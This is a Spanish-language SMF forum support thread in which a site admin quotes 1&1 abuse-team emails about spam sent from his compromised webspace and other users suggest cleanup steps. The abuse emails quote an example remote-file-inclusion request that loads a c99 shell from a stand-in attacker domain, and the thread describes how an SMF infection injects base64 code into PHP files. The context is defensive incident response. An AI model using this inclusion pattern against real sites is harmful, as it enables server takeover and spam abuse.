problema con ataques (urgente)

[kenet]

hopy me acava de eniar esto mi servidor. como no lo solucione me lo cortan.

Incorrect e-mail transmission from your 1&1 webspace

Code Select Expand

Currently your 1&1 webspace has been sending a large number of e-mails to
addresses which do not, or do no longer exist.

At this point, it has not been detected whether you send the e-mails yourself or
whether your 1&1 this is the result from an attack to your webspace. In this
case, third parties would currently be misusing your webspace for the
transmission of spam.

In both cases this compromises the security of your account and the
1&1 mail infrastructure. A high number of invalid addresses is considered
characteristic of spam transmissions.

To reestablish the security of your account and prevent a lock, please urgently
check the e-mail transmission from your webspace on the basis of the following.

IMPORTANT: In either case, please notify us by a short reply to this e-mail of
the steps you will have undertaken.

Code Select Expand

***************************************************************************
1 Newsletter or other mass-mailings
***************************************************************************
If you send a newsletter or other mass-mailing, give consideration to the
bounce messages you receive. For further information, see
http://en.wikipedia.org/wiki/Bounce_message

Just like postal addresses may become obsolete with time, your e-mail addresses
may get invalid as mail-accounts are closed, deleted or permanently refuse
your e-mail. The receiving mail server will then send a bounce message to inform
you that the address does no longer exist.

Delete every address from your address data base that replies with a permanent
error message.

Code Select Expand

***************************************************************************
2 Spam being sent after an external attack
***************************************************************************
Check whether the spam is being sent without your knowledge after an external
attack.

2.1   Stop the transmission: Your mail-log-file will show you which script is
being exploited for the spam transmission. Remove all executable rights from
that script promptly in order to stop the spamming.

2.2   Find the insecure scripts: Your access-log-files will show you the scripts
that have been exploited. Successful exploits often show a pattern like:
http://www.mydomain.com/index.php?page=http://www.attackerdomain.ru/c99.txt?

2.3   Secure your scripts: In case of a third party script, like Joomla!, check
the software provider's site for security updates and patches.

2.4    Delete malicious content: Check whether malicious content was up-loaded
to your webspace during the attack. Delete this content promptly.

For information on the technique the hackers use, see
http://en.wikipedia.org/wiki/Remote_File_Inclusion

If further information should be required, please reply to this e-mail and leave
our reference [Ticket AB7389906] in your message.

Thank you for your cooperation.
Kind Regards,

Abuse Team

--
Abuse Department
1&1 Internet España S.L.U.



necesito vuestra ayuda urgentisima.

PD. tambien encontre esto en mi los. es el unico error que tengo.

Code Select Expand



Guest 
Apply Filter: Only show the error messages of this IP address 194.8.75.109   

http://www.skinmod.es/index.php?wwwRedirect
Apply Filter: Only show the errors with the same message
Sorry Guest, you are banned from using this forum!
Your ban is not set to expire.


muchas gracias

[kenet]

encontre esto e mi base de datos del usuario Krisbarteo

puede ser de esto el mensaje de mi host?

lo encontre en log. hay algo de el todavia por que ya lo tengo mas que baneado.


Resultados de la búsqueda por "94.142.129.147" (al menos una de estas palabras):

 

Code Select Expand

  *
      0 resultado(s) en la tabla smf_admin_info_files
    *
      0 resultado(s) en la tabla smf_approval_queue
    *
      0 resultado(s) en la tabla smf_attachments
    *
      0 resultado(s) en la tabla smf_ban_groups
    *
      0 resultado(s) en la tabla smf_ban_items
    *
      0 resultado(s) en la tabla smf_board_permissions
    *
      0 resultado(s) en la tabla smf_boards
    *
      0 resultado(s) en la tabla smf_buddies
    *
      0 resultado(s) en la tabla smf_calendar
    *
      0 resultado(s) en la tabla smf_calendar_holidays
    *
      0 resultado(s) en la tabla smf_categories
    *
      0 resultado(s) en la tabla smf_collapsed_categories
    *
      0 resultado(s) en la tabla smf_custom_fields
    *
      0 resultado(s) en la tabla smf_group_moderators
    *
     [color=red] 1 resultado(s) en la tabla smf_log_actions Examinar Borrar[/color]
    *
      0 resultado(s) en la tabla smf_log_activity
    *
      0 resultado(s) en la tabla smf_log_banned
    *
      0 resultado(s) en la tabla smf_log_boards
    *
      0 resultado(s) en la tabla smf_log_comments
    *
      0 resultado(s) en la tabla smf_log_digest
    *
      0 resultado(s) en la tabla smf_log_errors
    *
      0 resultado(s) en la tabla smf_log_floodcontrol
    *
      0 resultado(s) en la tabla smf_log_group_requests
    *
      0 resultado(s) en la tabla smf_log_karma
    *
      0 resultado(s) en la tabla smf_log_mark_read
    *
      0 resultado(s) en la tabla smf_log_member_notices
    *
      0 resultado(s) en la tabla smf_log_notify
    *
      0 resultado(s) en la tabla smf_log_online
    *
      0 resultado(s) en la tabla smf_log_packages
    *
      0 resultado(s) en la tabla smf_log_polls
    *
      0 resultado(s) en la tabla smf_log_ratings
    *
      0 resultado(s) en la tabla smf_log_reported
    *
      0 resultado(s) en la tabla smf_log_reported_comments
    *
      0 resultado(s) en la tabla smf_log_scheduled_tasks
    *
      0 resultado(s) en la tabla smf_log_search_messages
    *
      0 resultado(s) en la tabla smf_log_search_results
    *
      0 resultado(s) en la tabla smf_log_search_subjects
    *
      0 resultado(s) en la tabla smf_log_search_topics
    *
      0 resultado(s) en la tabla smf_log_spider_hits
    *
      0 resultado(s) en la tabla smf_log_spider_stats
    *
      0 resultado(s) en la tabla smf_log_subscribed
    *
      0 resultado(s) en la tabla smf_log_topics
    *
      0 resultado(s) en la tabla smf_mail_queue
    *
      0 resultado(s) en la tabla smf_membergroups
    *
      0 resultado(s) en la tabla smf_members
    *
      0 resultado(s) en la tabla smf_message_icons
    *
      0 resultado(s) en la tabla smf_messages
    *
      0 resultado(s) en la tabla smf_moderators
    *
      0 resultado(s) en la tabla smf_openid_assoc
    *
      0 resultado(s) en la tabla smf_package_servers
    *
      0 resultado(s) en la tabla smf_permission_profiles
    *
      0 resultado(s) en la tabla smf_permissions
    *
      0 resultado(s) en la tabla smf_personal_messages
    *
      0 resultado(s) en la tabla smf_picture_comments
    *
      0 resultado(s) en la tabla smf_pm_recipients
    *
      0 resultado(s) en la tabla smf_pm_rules
    *
      0 resultado(s) en la tabla smf_poll_choices
    *
      0 resultado(s) en la tabla smf_polls
    *
      0 resultado(s) en la tabla smf_prefix
    *
      0 resultado(s) en la tabla smf_rotator_imgs
    *
      0 resultado(s) en la tabla smf_scheduled_tasks
    *
      0 resultado(s) en la tabla smf_sessions
    *
      0 resultado(s) en la tabla smf_settings
    *
      0 resultado(s) en la tabla smf_shoutbox
    *
      0 resultado(s) en la tabla smf_shoutbox_ban
    *
      0 resultado(s) en la tabla smf_shoutbox_settings
    *
      0 resultado(s) en la tabla smf_smileys
    *
      0 resultado(s) en la tabla smf_sp_articles
    *
      0 resultado(s) en la tabla smf_sp_blocks
    *
      0 resultado(s) en la tabla smf_sp_categories
    *
      0 resultado(s) en la tabla smf_sp_functions
    *
      0 resultado(s) en la tabla smf_sp_parameters
    *
      0 resultado(s) en la tabla smf_spiders
    *
      0 resultado(s) en la tabla smf_subscriptions
    *
      0 resultado(s) en la tabla smf_thank_you_post
    *
      0 resultado(s) en la tabla smf_themes
    *
      0 resultado(s) en la tabla smf_topics

Total: 1 resultado(s)

y esto lo tengo en mi tabla

Mostrando registros 0 - 0 (1 total, La consulta tardó 0.0028 seg)
consulta SQL:
SELECT *
FROM `db241862559`.`smf_log_actions`
WHERE `id_action` LIKE '%94.142.129.147%'
OR `log_time` LIKE '%94.142.129.147%'
OR `id_member` LIKE '%94.142.129.147%'
OR `ip` LIKE CONVERT( _utf8 '%94.142.129.147%'
USING latin1 )
COLLATE latin1_spanish_ci
OR `action` LIKE CONVERT( _utf8 '%94.142.129.147%'
USING latin1 )
COLLATE latin1_spanish_ci
OR `extra` LIKE CONVERT( _utf8 '%94.142.129.147%'
USING latin1 )
COLLATE latin1_spanish_ci
OR `id_board` LIKE '%94.142.129.147%'
OR `id_topic` LIKE '%94.142.129.147%'
OR `id_msg` LIKE '%94.142.129.147%'
OR `id_log` LIKE '%94.142.129.147%'
LIMIT 0 , 30





muchas gracias

[#jsDotx3]

Ese personaje, "Krisbarteo" es un caos en SMF, debes borrarlo y poner Anti Bots como re captcha SMF, AreYour Human? y hables con tu servidor del caso.

[kenet]

estuve mirando y los log que salen en la base de datos es por el baneo. eso entonces no tengo que borrarlos.

a ver si contacto con ellos y me dicen algo por que yo no veo nada.

el log de errores de mi foro no genera ni un error, solo puedo pensar que es de mi base de datos

PD: ya instale esto y alguno mas

Anti Bots  captcha SMF, AreYour Human

[Plissken]

Hola kenet, esto puede ayudarte:
http://www.nimiedad.com/2009/05/grave-vulnerabilidad-en-foros-smf.html [nofollow]

También usa estos neonicks (debes bloquearles el acceso):


SMF 1.1.9 creo que corrige este bug.

Un saludo

[franklinrony]

si aun no lo has hecho, te recomiendo que instales smf 1.1.9 ya que corrige varios fallos de seguridad, con la subida de avatares y adjuntos, que es por donde atacan  el sitio,al subir "imagenes" con codigo malicioso, los metodos antibot al parecer solo los que fucnioanan contra el registro de ese bot, tambien puedes agregar en las restricciones ese nombre Krisbarteo y revisa el avatar de ese usuario y eliminalo

[kenet]

el usuario no tenia avatar. tengo borrada su cuenta y baneado su ip y su msn.

me dices que instale la 1.1.9 entonces tendria que retoceder de version por que ahora tengo la RC1-1.

otra cosa, que me recomiendas hacer con lo que tengo en mi base de datos?

en ese sentido no tengo ni idea de manejar la base ni mirar lo que me puede estar afectando.

muchas gracias

[Plissken]

Si el usuario no subió avatar tu problema debe ser otro.
Comprueba esto:

"Esto crea en el servidor tres archivos llamados style.css.php, s.php, y dg.php. Además, a todos y cada uno de los archivos con extensión .php del servidor donde esté alojado el foro SMF se les añade en su parte superior un trozo de código php codificado en base64."

"¿CUÁLES SON LOS SÍNTOMAS?

Lo primero que se suele detectar es que desaparecen algunos avatares en el foro. También aparecen numerosos errores en el log de errores de administración, como "8: Undefined index: dhhag".

[kenet]

no tengo ningun archivo con ese nombre en mi servidor. y por lo del log de errores lo tengo limpisimo. no me genera ningun error la web. saludos

[franklinrony]

la pregunta es, antes del ataque ya tenias la rc1 instalada? pues precisamente corrige varios errores,entre otros lo de los avatares, suponía que tenias la serie 1.1.x, pero la rc1 esta bien, lo que t recomiendo es que bajes los archivos a tu pc y lso revises si es posible pasales un scaneo con el antivirus,hasta donde se lo que hace este bot es insertar codigo en lso archivos, peor si tienes backup de la bd seria de ir considerdno en usarla

[kenet]

no tengo copia de seguridad mas vieja de la que hice hoy. la web me anda perfecta lu unico es m,i servidor

la rc1 la tenia instalada ya de hace tiempo asi que por esa razon no creoq eu sea.



me acavo de dar cuenta de una cosa, nunca me avia pasado estro cuando lo tenia en

http://www.skinmod.es/foro/

pero hace unos dias lo instale directamente en la raiz

http://www.skinmod.es/

puede venir de hay mi problema?

gracias

[franklinrony]

mm no creo que sea, a menos que se hayan cambiado los permisos de las carpetas, por otro lado lo mejor sera cambiar los datos de acceso al panel, servidor smtp y desactivar o cambiar el pass de la cuenta ftp/shell a lo mejor es el mismo que figura en el archivo settings.php y se usa para todo(bds, ftp...)y lo esten usando para envio de spam,creoq ue hay una carpeta que se llama mail,donde se guardan los logs de envios para que lo revises

[kenet]

voy hacer lo que me comentas y posteo lo que encuentre. gracias frony

[kenet]

los archivos los twengo con los permisos 755, que rraro, no

mi sever tuene una carpeta que se llama log. y me fije en un achivo que se llama mail log.php que tiene un peso exajerado creo yo. puede ser eso lo de los mail

[M-DVD]

El problema lo tenían todas las ramas de SMF (1.0.X, 1.1.X y 2X). Fue solucionado con la última actualización.

Quizás el problema que tienes se deba a eso, o quizás no, la verdad no se.

Pero puedes probar como si ese fuese el problema y hacer:

- Podrías eliminar todos los avatares y adjuntos que tengas en el foro.

- Luego, borra todo lo que tengas en el host, y resube un foro limpio, instala y luego subes el backup.

Hasta donde se sabe, el spammer infectaba archivos php, html, css y js al azar; pero creo que hasta ahora no se sabe si también deja alguna puerta trasera, por eso es más sano borrar todo y resubir, en lugar de estar limpiando donde solo uno conoce que suele hacer cosas.

[kenet]

no me dieron ni tienpo, jejeje ya me cortaron

hoy me encontre con estos mensajes , pero por lo menos en español. ahora ya se donde esta mi error.

Code Select Expand

Nos ha llegado una gran cantidad de reclamaciones referentes a correo basuraenviado a través de su espacio web 1&1. El origen de las reclamaciones puede ser que su espacio web 1&1 fue comprometidodesde el exterior o que usted envía boletines o e-mails en grandes cantidades.

Code Select Expand

*******************************************************************************1 E-mail/Boletín auto enviado*******************************************************************************Por favor utilice como procedimiento para la inscripción en su boletín el"Confirmed Opt in", a fin de garantizar que los mensajes sean enviados realmentesólo a los destinatarios que han convenido explícitamente a su recepción. Como "Confirmed Opt-In" se entiende un proceso para el cual primero se envía une-mail pidiendo confirmación, queda activada la inscripción

Code Select Expand

*******************************************************************************2 E-mails enviados mediante un atacante desde el exterior*******************************************************************************Si usted recela que su espacio web fue comprometido, aquí algunos consejos paradeterminar la grieta en su sistema.  2.1 Examine sus ficheros 'logs' en búsqueda de singularidades. Prestar especialmente atención a los ficheros logs mail. http://www.sudominio.es/index.php?page=http://www.dominioestrano.ru/c99.txt?Encuentra mas información aquí: http://es.wikipedia.org/wiki/XSS 2.2 Si usted determina tales entradas, entonces es recomendable examinar elscript correspondiente, y si es necesario modificar lo de tal modo que ya nosean posibles tales ataques. 2.3 Proceda también a un examen de la totalidad de su espacio web en búsquedade scripts foráneos que fueren posiblemente instalados. 2.4 En caso de que con todo no se logre éxito, le recomendamos la eliminación completa de todos los ficheros en su espacio Web y la introducción de un respaldo limpio. En caso de desear un contacto ulterior, por favor responda usted con estee-mail, o procure que el [Ticket AB7388639] esté contenido en su e-mail. Saludos cordiales. Su equipo Abuse -- Dpto. Técnico-Abuse1&1 Internet España S.L.U.

y no me an dado ni un dia y me an cortado temporalmente.

Code Select Expand

Hemos recibido nuevas reclamaciones con referencia al envío de spam a través desu espacio web 1&1. Como recordará, ha sido informado hace poco acerca de estasituación. Para evitar el abuso continuado nos vimos obligados a bloquear temporalmente sucontrato. Para desbloquear su cuenta, háganos llegar una respuesta a nuestro primero e-mail. Apreciamos su entendimiento y su colaboración. Saludos cordiales, Su equipo Abuse -- Dpto. Técnico-Abuse1&1 Internet España S.L.U.

[kenet]

ya encontraron donde fue el ataque en mi ftp.

Code Select Expand

Agradecemos por su mensaje. Nosotros hemos analizado el envío de spam econstatamos que su espacio web 1&1 ha sido atacado. I. Los ficheros malignos siguientes se encontraban en su espacio web:./post.php./index.php II. Estos ficheros han sido subidos via FTP como verá al extracto de sus logsque le copiamos al fin de este e-mail. III. De lo deducimos que sus datos de acceso FTP han sido robados por un virusque se encuentra en su PC.

Code Select Expand

******************************************************************************IMPORTANTE: Este virus representa un grave peligro por sus datos privados e suespacio web 1&1.******************************************************************************  Para restablecer la seguridad de sus datos e su espacio web 1&1, realiza lossiguientes pasos: 1. Hace lo antes posible un scan de su PC con un software antivirus. Aquí unalista de software recomendada:- Norton 360http://security.symantec.comhttp://security.symantec.com/sscv6- Spyware Doctor http://www.pctools.com/spyware-doctor/- Sunbelt Software CounterSpyhttp://www.sunbelt-software.com/Home-Home-Office/CounterSpy/Download/- Kaspersky Lab Internet Securityhttp://www.kaspersky.com/- Lavasoft Ad-Awarehttp://www.lavasoft.com/products/ad-aware_se_personal.php- MacScan (para Mac)http://macscan.securemac.com/download.html 2. Altera seguidamente su contraseña del acceso FTP. Para su seguridad,nosotros hemos alterado la contraseña. Encontrará la contraseña actual en suPanel de Control 1&1. 3. Borra los ficheros precitados. Nota: Verá mas información aquí:http://faq.1and1.es/accesoweb/archivosweb/1.html 4. Visto que el virus en su PC puede ter habido espiado también otrascontraseñas, piense a alterar aun sus contraseñas para otros servicios como- su Panel de Control 1&1- su cuenta de banking electrónico- su cuenta con eBay, Amazon  Desbloqueamos su cuenta después de este mensaje. Por favor, sigue los pasosantes que los piratas no espíen de nuevo su contraseña de acceso FTP 1&1. Si desea consultarnos acerca de este tema, responda a este e-mail manteniendonuestra referencia [Ticket AB7389906] en su mensaje. Muchas gracias por su colaboración.Un cordial saludo, Su equipo de Abuso técnico-- Dpto. Técnico-Abuse1&1 Internet España S.L.U.

como podeis ver lo que me ataco fu

Los ficheros malignos siguientes se encontraban en su espacio

post.php.
index.php

asi que no se asta donde llegan los atques de este personaje

[franklinrony]

mientras no cambies las contraseñas posiblemente te siga ocurriendo eso que detallan,si todo esta limpio ha sun cambio de passwords y observa en los logs si ya no ocurre el problema

[kenet]

ok, eso es lo que iva acer, primero estoy cambiando lo de mis cuentas ebay etc, tarbien formatee mi ordenador y le instale el windwos 7 y borre de la base todo lo relaccionado con ese user.

[kenet]

tengo un problema despues de instalar el foro de nuevo, cuando intento subir un paquete desde mi panel de admi me pone esto.

Wrong value type sent to the database. Array of integers expected. (known_theme_list)